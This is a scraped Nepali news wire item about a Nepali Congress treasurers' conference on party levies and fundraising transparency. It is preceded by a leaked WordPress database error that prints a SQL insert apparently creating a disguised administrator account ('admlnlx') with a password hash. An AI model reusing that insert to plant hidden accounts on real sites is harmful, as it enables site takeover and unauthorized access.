WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDiEcv6wBR6R0nWM7TAnuuDvLukRoH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:45:21', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६ –
नेपाली काँग्रेसका कोषाध्यक्षको प्रथम राष्ट्रिय सम्मेलन यही पुस ८ गते हुने भएको छ ।
पार्टी सञ्चालनका लागि लेवीको व्यवस्थालाई थप व्यवस्थित बनाउने, राष्ट्रिय र अन्तर्राष्ट्रियस्तरमा हुने गरेका आर्थिक व्यवस्थापनको बारेमा वृहत छलफल गर्ने उद्देश्यका साथ सम्मेलनको आयोजना गरिएको हो ।
यहाँ आज आयोजित पत्रकार सम्मेलन नेपालमा क्रियाशील राजनीतिक दलहरूले पार्टी कोष निर्माणका लागि सञ्चालन गरिएका चन्दा अभियान, चन्दा दातालाई दिइएको अनुचित दबाब, त्यसको दुरूपयोग र अपारदर्शीताका कारण पार्टी र नेतासमेत बदनाम भएको हुँदा त्यसको निराकरणका लागि पनि सम्मेलनको आयोजना गरिएको सम्मेलनका संयोजक गाविन्द पुडासैनीले बताउनुभयो ।
उहाँले काँग्रेसले केन्द्रीय नेतृत्वसँग लाभदायी पदमा बसेका व्यक्तिसँग केन्द्रमै लेबी उठाउने गरेको र जिल्लालाई दिने भनि तोकिएको लेबी समेत जिल्लाबाट प्राप्त गर्न समस्या भएको हुँदा त्यस बरेमा पनि सम्म्लनमा छलफल हुने जानकारी दिनुभयो ।
आसन्न स्थानीय, प्रदेश र केन्द्रीय निर्वाचनमा नेपाली काँग्रेसलाई अझ सशक्त र बलियो बनाउन व्यवस्थित र पारदर्शी कोष निर्माणका लागि यो सम्मेलनले सहयोग परियाउने अपेक्षा गरिएको छ ।
दुई दिनसम्म राष्ट्रिय सभागृहमा हुने भनिएको सम्मेलनले काठमाडौँ घाषणापत्र जारी गरी सम्पन्न हुने बताइएको छ ।- रासस